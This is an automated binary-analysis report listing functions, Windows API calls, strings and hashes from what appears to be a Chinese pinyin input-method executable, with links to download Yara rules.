String ID: english$index$model$stock_shuangpin_dict$sysbitmap$sysdict
API String ID: 911062509-427922327
Opcode ID: 74507c09efc744b0f91c93fd2cbd56c4364ae6fc8d5dbdf7452aaa3788e7571f
Instruction ID: 19ec27c054188f50595e73c17a2beddaa22b8ce0026cab23963a044e5b244dfc
Opcode Fuzzy Hash: 74507c09efc744b0f91c93fd2cbd56c4364ae6fc8d5dbdf7452aaa3788e7571f
Instruction Fuzzy Hash: BD02AA715093818BD720EF64D485B9FBBE1BF85308F05096EE89947391D778E988CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D340, Relevance: 7.6, APIs: 5, Instructions: 72threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D290: EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
Part of subcall function 0040D290: std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6
Part of subcall function 0040D290: SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2E6
Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2F4

GetCurrentThreadId.KERNEL32 ref: 0040D3A4
SetUnhandledExceptionFilter.KERNEL32(0040D340), ref: 0040D3E2
__set_purecall_handler.LIBCMT ref: 0040D3ED
__set_purecall_handler.LIBCMT ref: 0040D3FA
LeaveCriticalSection.KERNEL32(0055F688), ref: 0040D40D

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: __set_purecall_handler$CriticalExceptionFilterSectionUnhandled$CurrentEnterLeaveThreadXinvalid_argumentstd::_
String ID:
API String ID: 2425247346-0
Opcode ID: a8a99099a9d6c3a525b81146ce48a787ae0cc985e6d48a5cc05ee7a3c844858a
Instruction ID: bc847fddc73032f664f0405f3088f02311ea41ef842b1240438881b6cea6dd8b
Opcode Fuzzy Hash: a8a99099a9d6c3a525b81146ce48a787ae0cc985e6d48a5cc05ee7a3c844858a
Instruction Fuzzy Hash: 2021FF72E046009BC3209B989C01B2BB7A4AB54724F140A3FFC12B32D4C77CA80C8B9B

Uniqueness

Uniqueness Score: -1.00%

Function 004510C0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 149COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004511AE

Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234

Strings

g, xrefs: 00451114
CHECK failed: (&from) != (this): , xrefs: 00451137
h5S, xrefs: 0045110C

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow_memmove
String ID: CHECK failed: (&from) != (this): $g$h5S
API String ID: 499820034-3496901833
Opcode ID: 8eb2a89f9c11637219fc82076f969256fd6e043cea1d3f78eeddceb4a3c6a400
Instruction ID: f2cbb80eabd344449a6794f95024dbfd70b538ec8c4499c8aeb854d4880d7aba
Opcode Fuzzy Hash: 8eb2a89f9c11637219fc82076f969256fd6e043cea1d3f78eeddceb4a3c6a400
Instruction Fuzzy Hash: 57517970604709AFD748CF19C891B9ABBE0BF88344F44861EF89697761D7B9E848CF85

Uniqueness

Uniqueness Score: -1.00%

Function 00463240, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32 ref: 00463295

Strings

%d.%d, xrefs: 004632D7
_x86, xrefs: 004632FC
_x64, xrefs: 004632F5

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Version
String ID: %d.%d$_x64$_x86
API String ID: 1889659487-901740950
Opcode ID: 17153d0d6c880cf86dbb0f9bac0e66d9a8220628e596d2916c5f130454b5306e
Instruction ID: cc2e0947374112cb31572f15c0253ab700ad9ffe9f4a9b8375848f35c070f6de
Opcode Fuzzy Hash: 17153d0d6c880cf86dbb0f9bac0e66d9a8220628e596d2916c5f130454b5306e
Instruction Fuzzy Hash: 1731D1712047858FC324CF19D842B9BB7E4FF88B21F00462EF55587391EB38AA05CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0044A520, Relevance: 6.9, Strings: 5, Instructions: 696COMMON

Download Yara Rule

Strings

CHECK failed: file != NULL: , xrefs: 0044A614
K, xrefs: 0044A5F0
i18n/cjk/ime/sync/sync_service.proto, xrefs: 0044A564
tIS, xrefs: 0044B059
h5S, xrefs: 0044A5E8

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeaveSleep_malloc
String ID: CHECK failed: file != NULL: $K$h5S$i18n/cjk/ime/sync/sync_service.proto$tIS
API String ID: 90256291-506951452
Opcode ID: 2db2f2fb1692c02dfc2696dbf8adba76c6ed3f505d7f1c33b7d2a0ce3135a953
Instruction ID: 9c4c201ecd332b8ecfb009201ce14e8cea42725c0258e7e8cb49531960cc88fb
Opcode Fuzzy Hash: 2db2f2fb1692c02dfc2696dbf8adba76c6ed3f505d7f1c33b7d2a0ce3135a953
Instruction Fuzzy Hash: 5E6249B0905741DBD300CF25D851A0AFBF0BBA4305F108A2EE85987761D7B9E969DFC6

Uniqueness

Uniqueness Score: -1.00%

Function 0042B2A0, Relevance: 6.4, APIs: 4, Instructions: 364synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?), ref: 0042B2C4

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: b165a2b7f3d612c552a60d65048c4a89cecd29a4a89dd1c9dc30cd3b7ea2c3b3
Instruction ID: 76501fffb9f0f2d6cc5d4dd47968be1a3977340234536f4488fccd0114660a6e
Opcode Fuzzy Hash: b165a2b7f3d612c552a60d65048c4a89cecd29a4a89dd1c9dc30cd3b7ea2c3b3
Instruction Fuzzy Hash: 7DE16171A002118FCB18CF29D49496AFBE2FF58314B96C5BED40A9B366D735E845CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0045C870, Relevance: 6.1, APIs: 4, Instructions: 90encryptionCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,0000000E,00000000,?,?,?,?,00000000,00000000), ref: 0045C8E0
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0045C8FA

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0045C937

Part of subcall function 0045C410: CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0045C49D

CertCloseStore.CRYPT32(?,00000000), ref: 0045C949

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Cert$Store$CertificatesEnum$CertificateCloseContextCryptDuplicateObjectQuery_malloc
String ID:
API String ID: 779759517-0
Opcode ID: 04e199a9b767ff5a81c793ca9781294fa02364d0331c0f4ebbf1caeb58a40cc2
Instruction ID: 47b38d528d5946a1d2475328b12807091c0131578beac7d4f4eeeee1861d3a1c
Opcode Fuzzy Hash: 04e199a9b767ff5a81c793ca9781294fa02364d0331c0f4ebbf1caeb58a40cc2
Instruction Fuzzy Hash: FD21A2B6508388AFC2109F59DCC4E2BB7E8FB89B54F440A1EF945D3241D739E8088769

Uniqueness

Uniqueness Score: -1.00%

Function 0040D300, Relevance: 6.0, APIs: 4, Instructions: 11COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000D340,0040D770,00000000,00000000,?,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D305
__set_purecall_handler.LIBCMT ref: 0040D310

Part of subcall function 004EEF10: DecodePointer.KERNEL32(?,?,0040CEB2,0040D430), ref: 004EEF1C
Part of subcall function 004EEF10: EncodePointer.KERNEL32(?,?,0040CEB2,0040D430), ref: 004EEF27

__set_purecall_handler.LIBCMT ref: 0040D31A

Part of subcall function 004EF7ED: DecodePointer.KERNEL32(?,?,0040CEC5,0040D620,00000001), ref: 004EF7F9
Part of subcall function 004EF7ED: EncodePointer.KERNEL32(0040CEC5,?,0040CEC5,0040D620,00000001), ref: 004EF804

LeaveCriticalSection.KERNEL32(0055F688,?,?,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D32D

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Pointer$DecodeEncode__set_purecall_handler$CriticalExceptionFilterLeaveSectionUnhandled
String ID:
API String ID: 1822871419-0
Opcode ID: e3bc963385a5c5c638b3f606ce8a81203bb7743e20bdfbc9115ce793ddd7aade
Instruction ID: f039bac7eb67d79cddce5311cb54bc5a1918dd879c7da714cda91e8319ecb516
Opcode Fuzzy Hash: e3bc963385a5c5c638b3f606ce8a81203bb7743e20bdfbc9115ce793ddd7aade
Instruction Fuzzy Hash: 95C01230E9060066CA107FE66C179073951BE7170B710093BF800200EAC57A101D9A6E

Uniqueness

Uniqueness Score: -1.00%

Function 0042F530, Relevance: 5.5, Strings: 4, Instructions: 452COMMON

Download Yara Rule

Strings

CHECK failed: file != NULL: , xrefs: 0042F624
i18n/cjk/ime/hosting/proto/download_item.proto, xrefs: 0042F574
9, xrefs: 0042F600
&S, xrefs: 0042FAD4

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeaveSleep_malloc
String ID: 9$CHECK failed: file != NULL: $i18n/cjk/ime/hosting/proto/download_item.proto$&S
API String ID: 90256291-3165441767
Opcode ID: e6472e69f7f0352ef42853d207965bd1eb50346a04bd1dc9fa07418ff089ef78
Instruction ID: bf76510ae2bf6063a001cc631b147606edc7c8e40d2e25d07c34b83edf2b2921
Opcode Fuzzy Hash: e6472e69f7f0352ef42853d207965bd1eb50346a04bd1dc9fa07418ff089ef78
Instruction Fuzzy Hash: 44129AB09057819BD300DF29D85160AFBE0BF94315F504A3EE8688B791DBB9A859CF86

Uniqueness

Uniqueness Score: -1.00%

Function 004415F0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70registrytimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,09D48295), ref: 0044164E
RegSetValueExW.ADVAPI32(?,LastPing,00000000,00000004,?,00000004), ref: 00441687

Part of subcall function 00443060: _memset.LIBCMT ref: 004430BA
Part of subcall function 00443060: RegCloseKey.ADVAPI32(?), ref: 004430FE

Part of subcall function 00465540: CreateMutexW.KERNEL32(00000000,00000000,GPY_DATA_STAT_MUTEX_2,00000000), ref: 004655C5

Part of subcall function 00465820: WaitForSingleObject.KERNEL32(?,000003E8,09D48295), ref: 00465864

Part of subcall function 00461750: DeleteCriticalSection.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 00461790
Part of subcall function 00461750: CloseHandle.KERNEL32(?), ref: 0046179E
Part of subcall function 00461750: CloseHandle.KERNEL32(?), ref: 004617A8
Part of subcall function 00461750: CloseHandle.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 004617C8

Strings

LastPing, xrefs: 00441681

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Close$Handle$CreateCriticalDeleteMutexObjectSectionSingleSystemTimeValueWait_memset
String ID: LastPing
API String ID: 2807491785-328612645
Opcode ID: e14ee2e5d078fd983817448fcd4abce73ed67cc6c34ede7d35b6e5b9cb98a21b
Instruction ID: ab01a09c1dd180fcf044be4d62bf175c6a94a6c3cf1b9db485ef3649255f7d81
Opcode Fuzzy Hash: e14ee2e5d078fd983817448fcd4abce73ed67cc6c34ede7d35b6e5b9cb98a21b
Instruction Fuzzy Hash: DF218DB15187409FC304DF65C841B1BB7E5EF98714F008A2EF5A5C6294EB78D504CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00411380, Relevance: 4.5, APIs: 3, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 004113BD
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 004113D6
FreeSid.ADVAPI32(?), ref: 004113E9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8dd860d5136d8b0229f8438fd183689a3ea6451e88ac678ff618b5effecc24d1
Instruction ID: ff86fd40aabaddb49ffbe76e0cb8b9c65a517733a7b90a3ef441941887aeb4b0
Opcode Fuzzy Hash: 8dd860d5136d8b0229f8438fd183689a3ea6451e88ac678ff618b5effecc24d1
Instruction Fuzzy Hash: 250148B1608341AFD300DF69C9C996FB7E8FF98700F809C2EF54A82250D334D8488B16

Uniqueness

Uniqueness Score: -1.00%

Function 0045D570, Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 790COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0045D80B

Strings

tRS, xrefs: 0045DDC9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: tRS
API String ID: 4104443479-3595970054
Opcode ID: f71222c2d0b856fbdc229dee9e70aabd235c40f86cd9d076d7bce668f738ac1b
Instruction ID: ae169882c9105e2d87253a9bd6754c19ae01c8e50d9f04d9b892bccdefe5daef
Opcode Fuzzy Hash: f71222c2d0b856fbdc229dee9e70aabd235c40f86cd9d076d7bce668f738ac1b
Instruction Fuzzy Hash: D8626EB5A047018FC724CF19C58061ABBF1FF88315F108A2EE89A87756E774E949CF96

Uniqueness

Uniqueness Score: -1.00%

Function 004B2370, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 622COMMON

Download Yara Rule

APIs

Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

Part of subcall function 004EF8DA: std::exception::exception.LIBCMT ref: 004EF929
Part of subcall function 004EF8DA: std::exception::exception.LIBCMT ref: 004EF943
Part of subcall function 004EF8DA: __CxxThrowException@8.LIBCMT ref: 004EF954
Part of subcall function 004EF8DA: __FF_MSGBANNER.LIBCMT ref: 004EF968
Part of subcall function 004EF8DA: __NMSG_WRITE.LIBCMT ref: 004EF970

_memmove.LIBCMT ref: 004B275A

Strings

CHECK failed: (&from) != (this): , xrefs: 004B23F9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalException@8SectionThrowstd::exception::exception$EnterLeave_malloc_memmove
String ID: CHECK failed: (&from) != (this):
API String ID: 1601740896-2589368188
Opcode ID: deff05450ebb7ee7bfe948b1855a44ba8481ef55cd88972ec92abb0ceb97e275
Instruction ID: 6d7382d96beb1b9424a9a212c8d0093b5115eefea9e15aba1a587c7fc64e1d67
Opcode Fuzzy Hash: deff05450ebb7ee7bfe948b1855a44ba8481ef55cd88972ec92abb0ceb97e275
Instruction Fuzzy Hash: 4B42A2706047419FC324DF29C580A56BBF1BF89314F544A6EE48A87B62C774FC86CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004B5670, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 610COMMON

Download Yara Rule

Strings

CHECK failed: (&from) != (this): , xrefs: 004B56F9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow
String ID: CHECK failed: (&from) != (this):
API String ID: 3988633896-2589368188
Opcode ID: 5bb92ec0da22d61667b21993d2df67295b0444e698f7ad7ff4f25aea3605e916
Instruction ID: 216a5626e4c0b652a10bba10b68b46a91553d1cdf035d5c11d8e946078c574a7
Opcode Fuzzy Hash: 5bb92ec0da22d61667b21993d2df67295b0444e698f7ad7ff4f25aea3605e916
Instruction Fuzzy Hash: E4426C71608B419FC744DF29C480A56FBF5BF89314F648A6EE4498B352C734EC82CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004B66D0, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 610COMMON

Download Yara Rule

Strings

CHECK failed: (&from) != (this): , xrefs: 004B6759

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow
String ID: CHECK failed: (&from) != (this):
API String ID: 3988633896-2589368188
Opcode ID: 992df3485e0b1def1ebeb7b097c81397ec0eb245c9064b28600f7a4e64883934
Instruction ID: 66f71b88159e772cda5679f90598184f7f95f81bb348ee80ca630f19e4c1f241
Opcode Fuzzy Hash: 992df3485e0b1def1ebeb7b097c81397ec0eb245c9064b28600f7a4e64883934
Instruction Fuzzy Hash: 5A429271608341DFC704DF29C480A56BBF5BF99314F658A6EE4498B352C738EC86CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004B3660, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 585COMMON

Download Yara Rule

Strings

CHECK failed: (&from) != (this): , xrefs: 004B36E9

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow
String ID: CHECK failed: (&from) != (this):
API String ID: 3988633896-2589368188
Opcode ID: 8935fc10fc60426d63667ba3fc913394de2afc97727821328c0dec35622536f1
Instruction ID: 16a376be9b350538b311b1ed61255a0690ea3d5c6d5e655459e36613e5d8462c
Opcode Fuzzy Hash: 8935fc10fc60426d63667ba3fc913394de2afc97727821328c0dec35622536f1
Instruction Fuzzy Hash: B332C1B1604741DFC314CF6AC480A56BBF1BF89314F648A6EE48987762C734ED85CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 004315E0, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 575COMMON

Download Yara Rule

Strings

CHECK failed: (&from) != (this): , xrefs: 00431669

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterException@8LeaveThrow
String ID: CHECK failed: (&from) != (this):
API String ID: 3988633896-2589368188
Opcode ID: 50c925ee3afea4493976cd1a307cd076d1118b4690078e1b96bec7db0ff4596c
Instruction ID: 1243531da4e44e2300a0c98a4ce86130b16687f280b8ad850037a72cfe222da1
Opcode Fuzzy Hash: 50c925ee3afea4493976cd1a307cd076d1118b4690078e1b96bec7db0ff4596c
Instruction Fuzzy Hash: 0D329E716047419FC714DF29C480A16BBF1BF9D314F14AA6EE5898B762C334EC86CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004286E0, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4

std::_Xinvalid_argument.LIBCPMT ref: 004289A5

Part of subcall function 00405250: std::_Xinvalid_argument.LIBCPMT ref: 00405268

Strings

list<T> too long, xrefs: 004289A0

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
